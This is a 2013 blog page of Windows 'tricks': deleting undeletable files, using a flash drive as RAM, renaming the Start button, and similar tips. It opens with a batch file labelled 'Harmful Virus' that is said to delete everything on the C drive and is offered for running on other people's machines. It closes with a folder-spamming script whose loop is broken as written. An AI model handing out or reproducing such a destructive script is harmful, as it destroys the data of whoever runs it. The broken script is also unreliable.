Saturday, 9 March 2013

Try Harmful Virus.................

Try Harmful Virus.................

Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

HOpe you enjoy !
keep visiting !



Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL <filename> where <filena
me> is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)

5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1

6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.

7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

HOpe you enjoy !
keep visiting !

Sunday, 3 February 2013

how to hack a website by using cmd?

How to Use a Flash Drive as RAM Memory

How to Use a Flash Drive as RAM Memory

Windows XP

1) Insert the Flash Drive then Right Click on Computer > Properties

2) Navigate to Advanced tab then click Settings under Performance section.

3) Click Advanced tab again, and click Change under Virtual Memory section.

4) Select the USB Flash Drive letter from the list, click Custom Size .

5) Set the minimum and maximum size to use in the Flash Drive (better choose same size of flash drive)

6) Press OK and Apply all settings, Restart your Computer for changes to take effect.

Windows Vista / 7

1) Insert USB Flash Drive into your computer.

2) Right Click on the USB Flash Drive > Properties

3) Navigate to ReadyBoost tab.

4) Select Use this Device and allocate the amount of memory to use (better choose around 80% of USB Flash Drive's size)
5) Click OK to apply all settings, then Restart the computer for changes to take effect

HOpe you enjoy !
keep visiting !



download :=

1. Using Resource Hacker, open the file explorer.exe located at C:\windows.

2. Expand string, expand 37, click on 1033

3. On right side raname “start” to anything you want. For ex. “yourname” and press “compile script”

4. Repeat the same procedure for string 38, 1033

5. Save changes in file menu (if error occurs close explorer.exe and repeat sub-step 3 and 4)

6. Restart your computer. After restart you can see the changes. Enjoy!

fuuny trick

Open vlc player and press "ctrl+n"

write "screen://" in URL without ctsn and press enter see the magic

enjoy ...

NOTEPAD TRICKS : how we create more then 25000 Empty Folder Created

1) Open your notepad and type the following code.

@echo off
md %random%
goto top

2) Save it as friendlylearn.bat

3) Click to Open friendlylearn.bat file...